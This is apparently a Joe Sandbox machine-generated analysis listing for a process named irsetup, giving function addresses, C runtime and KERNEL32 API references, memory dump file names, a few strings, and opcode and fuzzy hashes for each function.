Opcode ID: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
Instruction ID: a4978cb5b150d70a31ac02c29fe7af899a0e20301038a663c4a8e9806da71e5f
Opcode Fuzzy Hash: efb8f80f535dd6a2d24c0697e6c22cf98830df7b60d87533b7d0862d98f359d4
Instruction Fuzzy Hash: 4421D73171068886F793BB25D4113EE6351B7997D5F14C512BA5D0BAC3DF78CA08C701

Function 000000018002D20C Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 000000018002D233

Part of subcall function 000000018002F154: GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217

Part of subcall function 000000018002082C: ExitProcess.KERNEL32 ref: 000000018002083B

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

_errno.LIBCMT ref: 000000018002D275
_lock.LIBCMT ref: 000000018002D289
free.LIBCMT ref: 000000018002D2AB
_errno.LIBCMT ref: 000000018002D2B0
LeaveCriticalSection.KERNEL32(?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC,?,?,?,000000018001E8ED), ref: 000000018002D2D6

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
String ID:
API String ID: 1024173049-0
Opcode ID: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
Instruction ID: 6158d1e52bbdfd4d1479ce80147eb334c54af6b62df8d85375debdae957d05bd
Opcode Fuzzy Hash: f9a3d0602b32c47423bd0a26af43e17ba087fd98e23ddae29623a6a445744642
Instruction Fuzzy Hash: CD215831615A4C82F6E7AB50A9403EA6395A79D7C4F05C026BA4A877C6CFB8CA4C8340

Function 000000018002FEF8 Relevance: 10.5, APIs: 7, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000000018002FF05
_errno.LIBCMT ref: 000000018002FF0D

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

GetFileAttributesA.KERNEL32 ref: 000000018002FF3A
GetLastError.KERNEL32 ref: 000000018002FF45
_errno.LIBCMT ref: 000000018002FF52

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$AttributesDecodeErrorFileLastPointer__doserrno
String ID:
API String ID: 24609805-0
Opcode ID: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
Instruction ID: 62db423ae1bf48e4f4470d80ab43833ba7cfcbac53acf032b2a4a70ed809b53f
Opcode Fuzzy Hash: 94c48a60d4fbfc0b5a6a0842b258aac80337d5e1c2b04cd6df6984df9fe97840
Instruction Fuzzy Hash: 2B019E7161058C46FBF36B789A123FE23905F8E3D0F84C635FA15423CACE284A088711

Function 0000000180026160 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 000000018002618C
_set_exp.LIBCMT ref: 000000018002624A
_ctrlfp.LIBCMT ref: 000000018002628C

Part of subcall function 0000000180034090: _umatherr.LIBCMT ref: 00000001800340C9

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _ctrlfp$_set_exp_umatherr
String ID:
API String ID: 3511029064-0
Opcode ID: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
Instruction ID: b049e6e4e90f587d1ae26f8248ab9d02cc25cde2fa3ace03e7f94499fe5c5a36
Opcode Fuzzy Hash: f383c2724335ff887c08764a53c0f87718c9fdbc8d37a131baef65d24cef3064
Instruction Fuzzy Hash: 33413871E08E4C85F6A35A3489513EEA385DF9E3D5F11C325B9022B6F6DF18969E4300

Function 000000018003ABF8 Relevance: 9.1, APIs: 6, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

__initconout.LIBCMT ref: 000000018003AC26

Part of subcall function 000000018003E2DC: CreateFileA.KERNEL32 ref: 000000018003E305

WriteConsoleW.KERNEL32 ref: 000000018003AC52
GetLastError.KERNEL32 ref: 000000018003AC6D
GetConsoleOutputCP.KERNEL32(?,?,?,?,0000000180032960,?,?,?,00000001,00000000,?,00000001,0000000180032E64,?,00000000,?), ref: 000000018003AC7F
WideCharToMultiByte.KERNEL32 ref: 000000018003ACB2
WriteConsoleA.KERNEL32 ref: 000000018003ACD8

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
String ID:
API String ID: 2210154019-0
Opcode ID: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
Instruction ID: 99c728c995c363288e4645a8cfd7ec9812841acb19d10564c0c81df42c91df12
Opcode Fuzzy Hash: 6751fe089edf0d3651ccf3439736a7986d616d9716d8f81e805f98ec3326a3da
Instruction Fuzzy Hash: FF317135614A8C86FBA2CB10E8443A76361F78A7B8F619315F66A066E4CF7DC78D8740

Function 000000018002C254 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C25E
FlsGetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C26C
SetLastError.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C2C4

Part of subcall function 000000018002BFC8: Sleep.KERNEL32(?,?,?,000000018002C287,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C00D

FlsSetValue.KERNEL32(?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018002C298
free.LIBCMT ref: 000000018002C2BB

Part of subcall function 000000018002C1A0: _lock.LIBCMT ref: 000000018002C1F0
Part of subcall function 000000018002C1A0: _lock.LIBCMT ref: 000000018002C210

GetCurrentThreadId.KERNEL32 ref: 000000018002C2AC

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
Instruction ID: 0dfceef3c332b8433fd22f826c40fe3083664a76df6c8c25525dd3dfe5458ebd
Opcode Fuzzy Hash: c6be2b9ca0896070e5d30a9556d5f7dbea15bb6b7aa6b76ac9172d16f987874f
Instruction Fuzzy Hash: 63017135201B08C2FBE79BA5A5847A92391AB4CBE0F09C625F926423D5DE38D64D8711

Function 0000000180036640 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 000000018003665E

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180036670
free.LIBCMT ref: 0000000180036682
free.LIBCMT ref: 0000000180036694
free.LIBCMT ref: 00000001800366A6
free.LIBCMT ref: 00000001800366B8
free.LIBCMT ref: 00000001800366CA

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
Instruction ID: 4b4e489caf5932047fa857d54ce27d1b13f5d9450eda61c6167a0ffc8242f040
Opcode Fuzzy Hash: c854312b667536919d45c97cfe918c39d80e7c93ee6d8299403ff513b514958e
Instruction Fuzzy Hash: 1F01AD72600C0C91EBE3EB61D4A23F96360A7CC7C8F46C043F51E876A6CE24DB888725

Function 00000001800366D8 Relevance: 7.7, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 0000000180036758
free.LIBCMT ref: 000000018003677F
free.LIBCMT ref: 0000000180036A50
free.LIBCMT ref: 0000000180036A5C

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
Instruction ID: a769455a77138ef5747765841ac36d0ccc4094dbcb8b52754ceed79c47d1f62a
Opcode Fuzzy Hash: 46a5ff97737d957f977997d7f8ef082688914e401e484afc1b99451edae6a3dd
Instruction Fuzzy Hash: EEB17332714B8885EBA3DF62E4507DAB7A4F789BC4F408126BA8E47795DF38C219C740

Function 0000000180033C78 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000000180033CB2
_set_statfp.LIBCMT ref: 0000000180033CD0
_set_statfp.LIBCMT ref: 0000000180033CF9
_set_statfp.LIBCMT ref: 0000000180033EB8

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
Instruction ID: 12e77770c186e875bdaf3e9738c6c902f4d3ba9da1e990d93e387186277e3745
Opcode Fuzzy Hash: 8c1fbb2724019f2bd2ab1cfc31dadffe0dbe53658b306f513f87e87a36f524cb
Instruction Fuzzy Hash: 0851A832514D8C85F2F79F34B4963EBA351BB4A7D4F12C219BA562A5E0EF348B8D8700

Function 00000001800216AC Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800216D0

Part of subcall function 000000018002D20C: _FF_MSGBANNER.LIBCMT ref: 000000018002D233

_errno.LIBCMT ref: 00000001800216F2
_lock.LIBCMT ref: 0000000180021703
_errno.LIBCMT ref: 000000018002184A

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_lock
String ID:
API String ID: 8016435-0
Opcode ID: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
Instruction ID: d9f390f5e57b81c544825edcb0cf6f397babacc6c857381744f7d8a64d4c1da9
Opcode Fuzzy Hash: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
Instruction Fuzzy Hash: 87518F322047888AFBE79B2694417EE63A1F7A8BC5F54C015FE4947B86DF38CA0D8701

Function 000000018002ECF4 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 000000018002ED2D
_exception_enabled.LIBCMT ref: 000000018002ED54

Part of subcall function 000000018002EC38: _set_statfp.LIBCMT ref: 000000018002EC5F
Part of subcall function 000000018002EC38: _set_statfp.LIBCMT ref: 000000018002ECD2

_raise_exc.LIBCMT ref: 000000018002EDB9
_call_matherr.LIBCMT ref: 000000018002EDFC
_ctrlfp.LIBCMT ref: 000000018002EE14

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _ctrlfp_set_statfp$_call_matherr_exception_enabled_raise_exc
String ID:
API String ID: 932658401-0
Opcode ID: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
Instruction ID: 8ea2834ca092981a7e33b9b2295afd33eedbb5ae56d736279697e7e8cc69432a
Opcode Fuzzy Hash: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
Instruction Fuzzy Hash: 8D313D32608EC886D672DB15E4413EBB365FBCE394F154225FA8C5BB58DF39C5498B40

Function 000000018002F404 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F42D
DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F43C

Part of subcall function 000000018003A43C: _errno.LIBCMT ref: 000000018003A445

EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4B9

Part of subcall function 000000018002C04C: realloc.LIBCMT ref: 000000018002C077
Part of subcall function 000000018002C04C: Sleep.KERNEL32(?,?,00000000,000000018002F4A9,?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002C093

EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4C8
EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4D4

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errnorealloc
String ID:
API String ID: 1310268301-0
Opcode ID: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
Instruction ID: c9725b456daa9fdbd47dcba6a1973a2d1d59f8ec4ab8946eea0d685f15fedc00
Opcode Fuzzy Hash: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
Instruction Fuzzy Hash: D221D331301A4C81EAA3AF21E8457EBA391B34D7C0F44C835BA4D0778AEEB8C28CC341

Function 00007FF783F27EE4 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF783F27F1B
GetCurrentProcessId.KERNEL32 ref: 00007FF783F27F26
GetCurrentThreadId.KERNEL32 ref: 00007FF783F27F32
GetTickCount.KERNEL32 ref: 00007FF783F27F3E
QueryPerformanceCounter.KERNEL32 ref: 00007FF783F27F4F

Memory Dump Source

Source File: 00000002.00000002.4546760871.00007FF783CC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF783CC0000, based on PE: true

Associated: 00000002.00000002.4546710876.00007FF783CC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547332364.00007FF78401A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547645814.00007FF784149000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547698719.00007FF784156000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547754047.00007FF784159000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547754047.00007FF784165000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547754047.00007FF784177000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547918182.00007FF78417A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4547982677.00007FF78419F000.00000010.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4548011385.00007FF7841A2000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff783cc0000_irsetup.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
Instruction ID: 10f28d1c2889049d32b5a4576704e75605aa52472d93aee607282658a1e436d0
Opcode Fuzzy Hash: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
Instruction Fuzzy Hash: 8101C821A1DB0681E741AF26F88026AB370FB09B90FA52532DE5E87794DF7CD885C750

Function 0000000180038EBC Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180038EF3
GetCurrentProcessId.KERNEL32 ref: 0000000180038EFE
GetCurrentThreadId.KERNEL32 ref: 0000000180038F0A
GetTickCount.KERNEL32 ref: 0000000180038F16
QueryPerformanceCounter.KERNEL32 ref: 0000000180038F27

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
Instruction ID: 243d979cf980d91638068ba1cf51c6dd2d398df9d072928e8bbb030d2aa91185
Opcode Fuzzy Hash: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
Instruction Fuzzy Hash: FC015E31215A0886EBE28F21F9803966360F74DBD4F46A621FE5E477A4DF39CA9D8300

Function 00000001800324A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018002BAAC: _errno.LIBCMT ref: 000000018002BAB5

_errno.LIBCMT ref: 00000001800324D5
_errno.LIBCMT ref: 00000001800324F1
_getbuf.LIBCMT ref: 000000018003255E

Strings

%.14g, xrefs: 00000001800324BA

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getbuf
String ID: %.14g
API String ID: 606515832-3267037135
Opcode ID: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
Instruction ID: d7cf500bb31369f41dd2bf305ad7167dfc6d28a841a02d62a1bb6ec0d038c543
Opcode Fuzzy Hash: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
Instruction Fuzzy Hash: 5A41C272600B4886EBAB9F28D4513AE37A0E78CFD4F168215FA6A473D6DF34CA55C740

Function 000000018000E020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000E0A4

Part of subcall function 0000000180022200: _errno.LIBCMT ref: 000000018002221E

Strings

attempt to use a closed file, xrefs: 000000018000E04C
cur, xrefs: 000000018000E065
FILE*, xrefs: 000000018000E02F

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: FILE*$attempt to use a closed file$cur
API String ID: 2918714741-2248676531
Opcode ID: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
Instruction ID: 6c949a32b7c445aad4823cac95b0331f89fcc6844e5a922ae23727c4ae02fac2
Opcode Fuzzy Hash: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
Instruction Fuzzy Hash: CB216F71705A4881FB92EB52E5913EA6365E78DBC0F45C022FE4917B9ACE38C74E8740

Function 000000018000E2E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

fflush.LIBCMT ref: 000000018000E31E
_errno.LIBCMT ref: 000000018000E32A

Strings

attempt to use a closed file, xrefs: 000000018000E30C
FILE*, xrefs: 000000018000E2EF

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errnofflush
String ID: FILE*$attempt to use a closed file
API String ID: 748766958-999929173
Opcode ID: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
Instruction ID: effcfa852fb6302185ee5319f9c93b9d90322d014ae9de1df5db582a5132b004
Opcode Fuzzy Hash: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
Instruction Fuzzy Hash: F7117C31704A8881FB82EB52E1913EA6361A789BC0F448022BE0917B9ACE6CC6898740

Function 000000018002E4E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018002E4EA
_lock.LIBCMT ref: 000000018002E518
free.LIBCMT ref: 000000018002E54F

Strings

%.14g, xrefs: 000000018002E4E5

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _getptd_lockfree
String ID: %.14g
API String ID: 3892346632-3267037135
Opcode ID: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
